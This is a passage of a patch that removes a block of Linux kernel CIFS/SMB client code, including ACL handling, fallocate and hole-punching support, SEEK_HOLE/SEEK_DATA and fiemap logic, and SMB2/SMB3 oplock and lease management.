+-	if (aclflag & CIFS_ACL_OWNER || aclflag & CIFS_ACL_GROUP)
+-		access_flags |= WRITE_OWNER;
+-	if (aclflag & CIFS_ACL_SACL)
+-		access_flags |= SYSTEM_SECURITY;
+-	if (aclflag & CIFS_ACL_DACL)
+-		access_flags |= WRITE_DAC;
+-
+-	utf16_path = cifs_convert_path_to_utf16(path, cifs_sb);
+-	if (!utf16_path) {
+-		rc = -ENOMEM;
+-		free_xid(xid);
+-		return rc;
+-	}
+-
+-	oparms = (struct cifs_open_parms) {
+-		.tcon = tcon,
+-		.desired_access = access_flags,
+-		.create_options = cifs_create_options(cifs_sb, 0),
+-		.disposition = FILE_OPEN,
+-		.path = path,
+-		.fid = &fid,
+-	};
+-
+-	rc = SMB2_open(xid, &oparms, utf16_path, &oplock, NULL, NULL,
+-		       NULL, NULL);
+-	kfree(utf16_path);
+-	if (!rc) {
+-		rc = SMB2_set_acl(xid, tlink_tcon(tlink), fid.persistent_fid,
+-			    fid.volatile_fid, pnntsd, acllen, aclflag);
+-		SMB2_close(xid, tcon, fid.persistent_fid, fid.volatile_fid);
+-	}
+-
+-	cifs_put_tlink(tlink);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-/* Retrieve an ACL from the server */
+-static struct cifs_ntsd *
+-get_smb2_acl(struct cifs_sb_info *cifs_sb,
+-	     struct inode *inode, const char *path,
+-	     u32 *pacllen, u32 info)
+-{
+-	struct cifs_ntsd *pntsd = NULL;
+-	struct cifsFileInfo *open_file = NULL;
+-
+-	if (inode && !(info & SACL_SECINFO))
+-		open_file = find_readable_file(CIFS_I(inode), true);
+-	if (!open_file || (info & SACL_SECINFO))
+-		return get_smb2_acl_by_path(cifs_sb, path, pacllen, info);
+-
+-	pntsd = get_smb2_acl_by_fid(cifs_sb, &open_file->fid, pacllen, info);
+-	cifsFileInfo_put(open_file);
+-	return pntsd;
+-}
+-
+-static long smb3_zero_data(struct file *file, struct cifs_tcon *tcon,
+-			     loff_t offset, loff_t len, unsigned int xid)
+-{
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct file_zero_data_information fsctl_buf;
+-
+-	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
+-
+-	fsctl_buf.FileOffset = cpu_to_le64(offset);
+-	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
+-
+-	return SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
+-			  (char *)&fsctl_buf,
+-			  sizeof(struct file_zero_data_information),
+-			  0, NULL, NULL);
+-}
+-
+-static long smb3_zero_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len, bool keep_size)
+-{
+-	struct cifs_ses *ses = tcon->ses;
+-	struct inode *inode = file_inode(file);
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	long rc;
+-	unsigned int xid;
+-	__le64 eof;
+-
+-	xid = get_xid();
+-
+-	trace_smb3_zero_enter(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len);
+-
+-	inode_lock(inode);
+-	filemap_invalidate_lock(inode->i_mapping);
+-
+-	/*
+-	 * We zero the range through ioctl, so we need remove the page caches
+-	 * first, otherwise the data may be inconsistent with the server.
+-	 */
+-	truncate_pagecache_range(inode, offset, offset + len - 1);
+-
+-	/* if file not oplocked can't be sure whether asking to extend size */
+-	rc = -EOPNOTSUPP;
+-	if (keep_size == false && !CIFS_CACHE_READ(cifsi))
+-		goto zero_range_exit;
+-
+-	rc = smb3_zero_data(file, tcon, offset, len, xid);
+-	if (rc < 0)
+-		goto zero_range_exit;
+-
+-	/*
+-	 * do we also need to change the size of the file?
+-	 */
+-	if (keep_size == false && i_size_read(inode) < offset + len) {
+-		eof = cpu_to_le64(offset + len);
+-		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-				  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	}
+-
+- zero_range_exit:
+-	filemap_invalidate_unlock(inode->i_mapping);
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	if (rc)
+-		trace_smb3_zero_err(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len, rc);
+-	else
+-		trace_smb3_zero_done(xid, cfile->fid.persistent_fid, tcon->tid,
+-			      ses->Suid, offset, len);
+-	return rc;
+-}
+-
+-static long smb3_punch_hole(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t offset, loff_t len)
+-{
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct file_zero_data_information fsctl_buf;
+-	long rc;
+-	unsigned int xid;
+-	__u8 set_sparse = 1;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-	/* Need to make file sparse, if not already, before freeing range. */
+-	/* Consider adding equivalent for compressed since it could also work */
+-	if (!smb2_set_sparse(xid, tcon, cfile, inode, set_sparse)) {
+-		rc = -EOPNOTSUPP;
+-		goto out;
+-	}
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	/*
+-	 * We implement the punch hole through ioctl, so we need remove the page
+-	 * caches first, otherwise the data may be inconsistent with the server.
+-	 */
+-	truncate_pagecache_range(inode, offset, offset + len - 1);
+-
+-	cifs_dbg(FYI, "Offset %lld len %lld\n", offset, len);
+-
+-	fsctl_buf.FileOffset = cpu_to_le64(offset);
+-	fsctl_buf.BeyondFinalZero = cpu_to_le64(offset + len);
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid, FSCTL_SET_ZERO_DATA,
+-			(char *)&fsctl_buf,
+-			sizeof(struct file_zero_data_information),
+-			CIFSMaxBufSize, NULL, NULL);
+-	filemap_invalidate_unlock(inode->i_mapping);
+-out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static int smb3_simple_fallocate_write_range(unsigned int xid,
+-					     struct cifs_tcon *tcon,
+-					     struct cifsFileInfo *cfile,
+-					     loff_t off, loff_t len,
+-					     char *buf)
+-{
+-	struct cifs_io_parms io_parms = {0};
+-	int nbytes;
+-	int rc = 0;
+-	struct kvec iov[2];
+-
+-	io_parms.netfid = cfile->fid.netfid;
+-	io_parms.pid = current->tgid;
+-	io_parms.tcon = tcon;
+-	io_parms.persistent_fid = cfile->fid.persistent_fid;
+-	io_parms.volatile_fid = cfile->fid.volatile_fid;
+-
+-	while (len) {
+-		io_parms.offset = off;
+-		io_parms.length = len;
+-		if (io_parms.length > SMB2_MAX_BUFFER_SIZE)
+-			io_parms.length = SMB2_MAX_BUFFER_SIZE;
+-		/* iov[0] is reserved for smb header */
+-		iov[1].iov_base = buf;
+-		iov[1].iov_len = io_parms.length;
+-		rc = SMB2_write(xid, &io_parms, &nbytes, iov, 1);
+-		if (rc)
+-			break;
+-		if (nbytes > len)
+-			return -EINVAL;
+-		buf += nbytes;
+-		off += nbytes;
+-		len -= nbytes;
+-	}
+-	return rc;
+-}
+-
+-static int smb3_simple_fallocate_range(unsigned int xid,
+-				       struct cifs_tcon *tcon,
+-				       struct cifsFileInfo *cfile,
+-				       loff_t off, loff_t len)
+-{
+-	struct file_allocated_range_buffer in_data, *out_data = NULL, *tmp_data;
+-	u32 out_data_len;
+-	char *buf = NULL;
+-	loff_t l;
+-	int rc;
+-
+-	in_data.file_offset = cpu_to_le64(off);
+-	in_data.length = cpu_to_le64(len);
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			1024 * sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc)
+-		goto out;
+-
+-	buf = kzalloc(1024 * 1024, GFP_KERNEL);
+-	if (buf == NULL) {
+-		rc = -ENOMEM;
+-		goto out;
+-	}
+-
+-	tmp_data = out_data;
+-	while (len) {
+-		/*
+-		 * The rest of the region is unmapped so write it all.
+-		 */
+-		if (out_data_len == 0) {
+-			rc = smb3_simple_fallocate_write_range(xid, tcon,
+-					       cfile, off, len, buf);
+-			goto out;
+-		}
+-
+-		if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-			rc = -EINVAL;
+-			goto out;
+-		}
+-
+-		if (off < le64_to_cpu(tmp_data->file_offset)) {
+-			/*
+-			 * We are at a hole. Write until the end of the region
+-			 * or until the next allocated data,
+-			 * whichever comes next.
+-			 */
+-			l = le64_to_cpu(tmp_data->file_offset) - off;
+-			if (len < l)
+-				l = len;
+-			rc = smb3_simple_fallocate_write_range(xid, tcon,
+-					       cfile, off, l, buf);
+-			if (rc)
+-				goto out;
+-			off = off + l;
+-			len = len - l;
+-			if (len == 0)
+-				goto out;
+-		}
+-		/*
+-		 * We are at a section of allocated data, just skip forward
+-		 * until the end of the data or the end of the region
+-		 * we are supposed to fallocate, whichever comes first.
+-		 */
+-		l = le64_to_cpu(tmp_data->length);
+-		if (len < l)
+-			l = len;
+-		off += l;
+-		len -= l;
+-
+-		tmp_data = &tmp_data[1];
+-		out_data_len -= sizeof(struct file_allocated_range_buffer);
+-	}
+-
+- out:
+-	kfree(out_data);
+-	kfree(buf);
+-	return rc;
+-}
+-
+-
+-static long smb3_simple_falloc(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t off, loff_t len, bool keep_size)
+-{
+-	struct inode *inode;
+-	struct cifsInodeInfo *cifsi;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	long rc = -EOPNOTSUPP;
+-	unsigned int xid;
+-	__le64 eof;
+-
+-	xid = get_xid();
+-
+-	inode = d_inode(cfile->dentry);
+-	cifsi = CIFS_I(inode);
+-
+-	trace_smb3_falloc_enter(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len);
+-	/* if file not oplocked can't be sure whether asking to extend size */
+-	if (!CIFS_CACHE_READ(cifsi))
+-		if (keep_size == false) {
+-			trace_smb3_falloc_err(xid, cfile->fid.persistent_fid,
+-				tcon->tid, tcon->ses->Suid, off, len, rc);
+-			free_xid(xid);
+-			return rc;
+-		}
+-
+-	/*
+-	 * Extending the file
+-	 */
+-	if ((keep_size == false) && i_size_read(inode) < off + len) {
+-		rc = inode_newsize_ok(inode, off + len);
+-		if (rc)
+-			goto out;
+-
+-		if (cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)
+-			smb2_set_sparse(xid, tcon, cfile, inode, false);
+-
+-		eof = cpu_to_le64(off + len);
+-		rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-				  cfile->fid.volatile_fid, cfile->pid, &eof);
+-		if (rc == 0) {
+-			cifsi->server_eof = off + len;
+-			cifs_setsize(inode, off + len);
+-			cifs_truncate_page(inode->i_mapping, inode->i_size);
+-			truncate_setsize(inode, off + len);
+-		}
+-		goto out;
+-	}
+-
+-	/*
+-	 * Files are non-sparse by default so falloc may be a no-op
+-	 * Must check if file sparse. If not sparse, and since we are not
+-	 * extending then no need to do anything since file already allocated
+-	 */
+-	if ((cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE) == 0) {
+-		rc = 0;
+-		goto out;
+-	}
+-
+-	if (keep_size == true) {
+-		/*
+-		 * We can not preallocate pages beyond the end of the file
+-		 * in SMB2
+-		 */
+-		if (off >= i_size_read(inode)) {
+-			rc = 0;
+-			goto out;
+-		}
+-		/*
+-		 * For fallocates that are partially beyond the end of file,
+-		 * clamp len so we only fallocate up to the end of file.
+-		 */
+-		if (off + len > i_size_read(inode)) {
+-			len = i_size_read(inode) - off;
+-		}
+-	}
+-
+-	if ((keep_size == true) || (i_size_read(inode) >= off + len)) {
+-		/*
+-		 * At this point, we are trying to fallocate an internal
+-		 * regions of a sparse file. Since smb2 does not have a
+-		 * fallocate command we have two otions on how to emulate this.
+-		 * We can either turn the entire file to become non-sparse
+-		 * which we only do if the fallocate is for virtually
+-		 * the whole file,  or we can overwrite the region with zeroes
+-		 * using SMB2_write, which could be prohibitevly expensive
+-		 * if len is large.
+-		 */
+-		/*
+-		 * We are only trying to fallocate a small region so
+-		 * just write it with zero.
+-		 */
+-		if (len <= 1024 * 1024) {
+-			rc = smb3_simple_fallocate_range(xid, tcon, cfile,
+-							 off, len);
+-			goto out;
+-		}
+-
+-		/*
+-		 * Check if falloc starts within first few pages of file
+-		 * and ends within a few pages of the end of file to
+-		 * ensure that most of file is being forced to be
+-		 * fallocated now. If so then setting whole file sparse
+-		 * ie potentially making a few extra pages at the beginning
+-		 * or end of the file non-sparse via set_sparse is harmless.
+-		 */
+-		if ((off > 8192) || (off + len + 8192 < i_size_read(inode))) {
+-			rc = -EOPNOTSUPP;
+-			goto out;
+-		}
+-	}
+-
+-	smb2_set_sparse(xid, tcon, cfile, inode, false);
+-	rc = 0;
+-
+-out:
+-	if (rc)
+-		trace_smb3_falloc_err(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len, rc);
+-	else
+-		trace_smb3_falloc_done(xid, cfile->fid.persistent_fid, tcon->tid,
+-				tcon->ses->Suid, off, len);
+-
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long smb3_collapse_range(struct file *file, struct cifs_tcon *tcon,
+-			    loff_t off, loff_t len)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct inode *inode = file_inode(file);
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct cifsInodeInfo *cifsi = CIFS_I(inode);
+-	__le64 eof;
+-	loff_t old_eof;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-
+-	old_eof = i_size_read(inode);
+-	if ((off >= old_eof) ||
+-	    off + len >= old_eof) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof - 1);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	truncate_pagecache_range(inode, off, old_eof);
+-
+-	rc = smb2_copychunk_range(xid, cfile, cfile, off + len,
+-				  old_eof - off - len, off);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	eof = cpu_to_le64(old_eof - len);
+-	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = 0;
+-
+-	cifsi->server_eof = i_size_read(inode) - len;
+-	truncate_setsize(inode, cifsi->server_eof);
+-	fscache_resize_cookie(cifs_inode_cookie(inode), cifsi->server_eof);
+-out_2:
+-	filemap_invalidate_unlock(inode->i_mapping);
+- out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static long smb3_insert_range(struct file *file, struct cifs_tcon *tcon,
+-			      loff_t off, loff_t len)
+-{
+-	int rc;
+-	unsigned int xid;
+-	struct cifsFileInfo *cfile = file->private_data;
+-	struct inode *inode = file_inode(file);
+-	__le64 eof;
+-	__u64  count, old_eof;
+-
+-	xid = get_xid();
+-
+-	inode_lock(inode);
+-
+-	old_eof = i_size_read(inode);
+-	if (off >= old_eof) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	count = old_eof - off;
+-	eof = cpu_to_le64(old_eof + len);
+-
+-	filemap_invalidate_lock(inode->i_mapping);
+-	rc = filemap_write_and_wait_range(inode->i_mapping, off, old_eof + len - 1);
+-	if (rc < 0)
+-		goto out_2;
+-	truncate_pagecache_range(inode, off, old_eof);
+-
+-	rc = SMB2_set_eof(xid, tcon, cfile->fid.persistent_fid,
+-			  cfile->fid.volatile_fid, cfile->pid, &eof);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = smb2_copychunk_range(xid, cfile, cfile, off, count, off + len);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = smb3_zero_data(file, tcon, off, len, xid);
+-	if (rc < 0)
+-		goto out_2;
+-
+-	rc = 0;
+-out_2:
+-	filemap_invalidate_unlock(inode->i_mapping);
+- out:
+-	inode_unlock(inode);
+-	free_xid(xid);
+-	return rc;
+-}
+-
+-static loff_t smb3_llseek(struct file *file, struct cifs_tcon *tcon, loff_t offset, int whence)
+-{
+-	struct cifsFileInfo *wrcfile, *cfile = file->private_data;
+-	struct cifsInodeInfo *cifsi;
+-	struct inode *inode;
+-	int rc = 0;
+-	struct file_allocated_range_buffer in_data, *out_data = NULL;
+-	u32 out_data_len;
+-	unsigned int xid;
+-
+-	if (whence != SEEK_HOLE && whence != SEEK_DATA)
+-		return generic_file_llseek(file, offset, whence);
+-
+-	inode = d_inode(cfile->dentry);
+-	cifsi = CIFS_I(inode);
+-
+-	if (offset < 0 || offset >= i_size_read(inode))
+-		return -ENXIO;
+-
+-	xid = get_xid();
+-	/*
+-	 * We need to be sure that all dirty pages are written as they
+-	 * might fill holes on the server.
+-	 * Note that we also MUST flush any written pages since at least
+-	 * some servers (Windows2016) will not reflect recent writes in
+-	 * QUERY_ALLOCATED_RANGES until SMB2_flush is called.
+-	 */
+-	wrcfile = find_writable_file(cifsi, FIND_WR_ANY);
+-	if (wrcfile) {
+-		filemap_write_and_wait(inode->i_mapping);
+-		smb2_flush_file(xid, tcon, &wrcfile->fid);
+-		cifsFileInfo_put(wrcfile);
+-	}
+-
+-	if (!(cifsi->cifsAttrs & FILE_ATTRIBUTE_SPARSE_FILE)) {
+-		if (whence == SEEK_HOLE)
+-			offset = i_size_read(inode);
+-		goto lseek_exit;
+-	}
+-
+-	in_data.file_offset = cpu_to_le64(offset);
+-	in_data.length = cpu_to_le64(i_size_read(inode));
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc == -E2BIG)
+-		rc = 0;
+-	if (rc)
+-		goto lseek_exit;
+-
+-	if (whence == SEEK_HOLE && out_data_len == 0)
+-		goto lseek_exit;
+-
+-	if (whence == SEEK_DATA && out_data_len == 0) {
+-		rc = -ENXIO;
+-		goto lseek_exit;
+-	}
+-
+-	if (out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto lseek_exit;
+-	}
+-	if (whence == SEEK_DATA) {
+-		offset = le64_to_cpu(out_data->file_offset);
+-		goto lseek_exit;
+-	}
+-	if (offset < le64_to_cpu(out_data->file_offset))
+-		goto lseek_exit;
+-
+-	offset = le64_to_cpu(out_data->file_offset) + le64_to_cpu(out_data->length);
+-
+- lseek_exit:
+-	free_xid(xid);
+-	kfree(out_data);
+-	if (!rc)
+-		return vfs_setpos(file, offset, inode->i_sb->s_maxbytes);
+-	else
+-		return rc;
+-}
+-
+-static int smb3_fiemap(struct cifs_tcon *tcon,
+-		       struct cifsFileInfo *cfile,
+-		       struct fiemap_extent_info *fei, u64 start, u64 len)
+-{
+-	unsigned int xid;
+-	struct file_allocated_range_buffer in_data, *out_data;
+-	u32 out_data_len;
+-	int i, num, rc, flags, last_blob;
+-	u64 next;
+-
+-	rc = fiemap_prep(d_inode(cfile->dentry), fei, start, &len, 0);
+-	if (rc)
+-		return rc;
+-
+-	xid = get_xid();
+- again:
+-	in_data.file_offset = cpu_to_le64(start);
+-	in_data.length = cpu_to_le64(len);
+-
+-	rc = SMB2_ioctl(xid, tcon, cfile->fid.persistent_fid,
+-			cfile->fid.volatile_fid,
+-			FSCTL_QUERY_ALLOCATED_RANGES,
+-			(char *)&in_data, sizeof(in_data),
+-			1024 * sizeof(struct file_allocated_range_buffer),
+-			(char **)&out_data, &out_data_len);
+-	if (rc == -E2BIG) {
+-		last_blob = 0;
+-		rc = 0;
+-	} else
+-		last_blob = 1;
+-	if (rc)
+-		goto out;
+-
+-	if (out_data_len && out_data_len < sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-	if (out_data_len % sizeof(struct file_allocated_range_buffer)) {
+-		rc = -EINVAL;
+-		goto out;
+-	}
+-
+-	num = out_data_len / sizeof(struct file_allocated_range_buffer);
+-	for (i = 0; i < num; i++) {
+-		flags = 0;
+-		if (i == num - 1 && last_blob)
+-			flags |= FIEMAP_EXTENT_LAST;
+-
+-		rc = fiemap_fill_next_extent(fei,
+-				le64_to_cpu(out_data[i].file_offset),
+-				le64_to_cpu(out_data[i].file_offset),
+-				le64_to_cpu(out_data[i].length),
+-				flags);
+-		if (rc < 0)
+-			goto out;
+-		if (rc == 1) {
+-			rc = 0;
+-			goto out;
+-		}
+-	}
+-
+-	if (!last_blob) {
+-		next = le64_to_cpu(out_data[num - 1].file_offset) +
+-		  le64_to_cpu(out_data[num - 1].length);
+-		len = len - (next - start);
+-		start = next;
+-		goto again;
+-	}
+-
+- out:
+-	free_xid(xid);
+-	kfree(out_data);
+-	return rc;
+-}
+-
+-static long smb3_fallocate(struct file *file, struct cifs_tcon *tcon, int mode,
+-			   loff_t off, loff_t len)
+-{
+-	/* KEEP_SIZE already checked for by do_fallocate */
+-	if (mode & FALLOC_FL_PUNCH_HOLE)
+-		return smb3_punch_hole(file, tcon, off, len);
+-	else if (mode & FALLOC_FL_ZERO_RANGE) {
+-		if (mode & FALLOC_FL_KEEP_SIZE)
+-			return smb3_zero_range(file, tcon, off, len, true);
+-		return smb3_zero_range(file, tcon, off, len, false);
+-	} else if (mode == FALLOC_FL_KEEP_SIZE)
+-		return smb3_simple_falloc(file, tcon, off, len, true);
+-	else if (mode == FALLOC_FL_COLLAPSE_RANGE)
+-		return smb3_collapse_range(file, tcon, off, len);
+-	else if (mode == FALLOC_FL_INSERT_RANGE)
+-		return smb3_insert_range(file, tcon, off, len);
+-	else if (mode == 0)
+-		return smb3_simple_falloc(file, tcon, off, len, false);
+-
+-	return -EOPNOTSUPP;
+-}
+-
+-static void
+-smb2_downgrade_oplock(struct TCP_Server_Info *server,
+-		      struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	server->ops->set_oplock_level(cinode, oplock, 0, NULL);
+-}
+-
+-static void
+-smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache);
+-
+-static void
+-smb3_downgrade_oplock(struct TCP_Server_Info *server,
+-		       struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache)
+-{
+-	unsigned int old_state = cinode->oplock;
+-	unsigned int old_epoch = cinode->epoch;
+-	unsigned int new_state;
+-
+-	if (epoch > old_epoch) {
+-		smb21_set_oplock_level(cinode, oplock, 0, NULL);
+-		cinode->epoch = epoch;
+-	}
+-
+-	new_state = cinode->oplock;
+-	*purge_cache = false;
+-
+-	if ((old_state & CIFS_CACHE_READ_FLG) != 0 &&
+-	    (new_state & CIFS_CACHE_READ_FLG) == 0)
+-		*purge_cache = true;
+-	else if (old_state == new_state && (epoch - old_epoch > 1))
+-		*purge_cache = true;
+-}
+-
+-static void
+-smb2_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	oplock &= 0xFF;
+-	cinode->lease_granted = false;
+-	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
+-		return;
+-	if (oplock == SMB2_OPLOCK_LEVEL_BATCH) {
+-		cinode->oplock = CIFS_CACHE_RHW_FLG;
+-		cifs_dbg(FYI, "Batch Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE) {
+-		cinode->oplock = CIFS_CACHE_RW_FLG;
+-		cifs_dbg(FYI, "Exclusive Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else if (oplock == SMB2_OPLOCK_LEVEL_II) {
+-		cinode->oplock = CIFS_CACHE_READ_FLG;
+-		cifs_dbg(FYI, "Level II Oplock granted on inode %p\n",
+-			 &cinode->netfs.inode);
+-	} else
+-		cinode->oplock = 0;
+-}
+-
+-static void
+-smb21_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		       unsigned int epoch, bool *purge_cache)
+-{
+-	char message[5] = {0};
+-	unsigned int new_oplock = 0;
+-
+-	oplock &= 0xFF;
+-	cinode->lease_granted = true;
+-	if (oplock == SMB2_OPLOCK_LEVEL_NOCHANGE)
+-		return;
+-
+-	/* Check if the server granted an oplock rather than a lease */
+-	if (oplock & SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-		return smb2_set_oplock_level(cinode, oplock, epoch,
+-					     purge_cache);
+-
+-	if (oplock & SMB2_LEASE_READ_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_READ_FLG;
+-		strcat(message, "R");
+-	}
+-	if (oplock & SMB2_LEASE_HANDLE_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_HANDLE_FLG;
+-		strcat(message, "H");
+-	}
+-	if (oplock & SMB2_LEASE_WRITE_CACHING_HE) {
+-		new_oplock |= CIFS_CACHE_WRITE_FLG;
+-		strcat(message, "W");
+-	}
+-	if (!new_oplock)
+-		strncpy(message, "None", sizeof(message));
+-
+-	cinode->oplock = new_oplock;
+-	cifs_dbg(FYI, "%s Lease granted on inode %p\n", message,
+-		 &cinode->netfs.inode);
+-}
+-
+-static void
+-smb3_set_oplock_level(struct cifsInodeInfo *cinode, __u32 oplock,
+-		      unsigned int epoch, bool *purge_cache)
+-{
+-	unsigned int old_oplock = cinode->oplock;
+-
+-	smb21_set_oplock_level(cinode, oplock, epoch, purge_cache);
+-
+-	if (purge_cache) {
+-		*purge_cache = false;
+-		if (old_oplock == CIFS_CACHE_READ_FLG) {
+-			if (cinode->oplock == CIFS_CACHE_READ_FLG &&
+-			    (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RH_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-			else if (cinode->oplock == 0 &&
+-				 (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-		} else if (old_oplock == CIFS_CACHE_RH_FLG) {
+-			if (cinode->oplock == CIFS_CACHE_RH_FLG &&
+-			    (epoch - cinode->epoch > 0))
+-				*purge_cache = true;
+-			else if (cinode->oplock == CIFS_CACHE_RHW_FLG &&
+-				 (epoch - cinode->epoch > 1))
+-				*purge_cache = true;
+-		}
+-		cinode->epoch = epoch;
+-	}
+-}
+-
+-#ifdef CONFIG_CIFS_ALLOW_INSECURE_LEGACY
+-static bool
+-smb2_is_read_op(__u32 oplock)
+-{
+-	return oplock == SMB2_OPLOCK_LEVEL_II;
+-}
+-#endif /* CIFS_ALLOW_INSECURE_LEGACY */
+-
+-static bool
+-smb21_is_read_op(__u32 oplock)
+-{
+-	return (oplock & SMB2_LEASE_READ_CACHING_HE) &&
+-	       !(oplock & SMB2_LEASE_WRITE_CACHING_HE);
+-}
+-
+-static __le32
+-map_oplock_to_lease(u8 oplock)
+-{
+-	if (oplock == SMB2_OPLOCK_LEVEL_EXCLUSIVE)
+-		return SMB2_LEASE_WRITE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE;
+-	else if (oplock == SMB2_OPLOCK_LEVEL_II)
+-		return SMB2_LEASE_READ_CACHING_LE;
+-	else if (oplock == SMB2_OPLOCK_LEVEL_BATCH)
+-		return SMB2_LEASE_HANDLE_CACHING_LE | SMB2_LEASE_READ_CACHING_LE |
+-		       SMB2_LEASE_WRITE_CACHING_LE;
+-	return 0;
+-}
+-
+-static char *
+-smb2_create_lease_buf(u8 *lease_key, u8 oplock)
+-{
+-	struct create_lease *buf;
+-
+-	buf = kzalloc(sizeof(struct create_lease), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
+-	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_lease, lcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
+-	buf->Name[0] = 'R';
+-	buf->Name[1] = 'q';
+-	buf->Name[2] = 'L';
+-	buf->Name[3] = 's';
+-	return (char *)buf;
+-}
+-
+-static char *
+-smb3_create_lease_buf(u8 *lease_key, u8 oplock)
+-{
+-	struct create_lease_v2 *buf;
+-
+-	buf = kzalloc(sizeof(struct create_lease_v2), GFP_KERNEL);
+-	if (!buf)
+-		return NULL;
+-
+-	memcpy(&buf->lcontext.LeaseKey, lease_key, SMB2_LEASE_KEY_SIZE);
+-	buf->lcontext.LeaseState = map_oplock_to_lease(oplock);
+-
+-	buf->ccontext.DataOffset = cpu_to_le16(offsetof
+-					(struct create_lease_v2, lcontext));
+-	buf->ccontext.DataLength = cpu_to_le32(sizeof(struct lease_context_v2));
+-	buf->ccontext.NameOffset = cpu_to_le16(offsetof
+-				(struct create_lease_v2, Name));
+-	buf->ccontext.NameLength = cpu_to_le16(4);
+-	/* SMB2_CREATE_REQUEST_LEASE is "RqLs" */
+-	buf->Name[0] = 'R';
+-	buf->Name[1] = 'q';
+-	buf->Name[2] = 'L';
+-	buf->Name[3] = 's';
+-	return (char *)buf;
+-}
+-
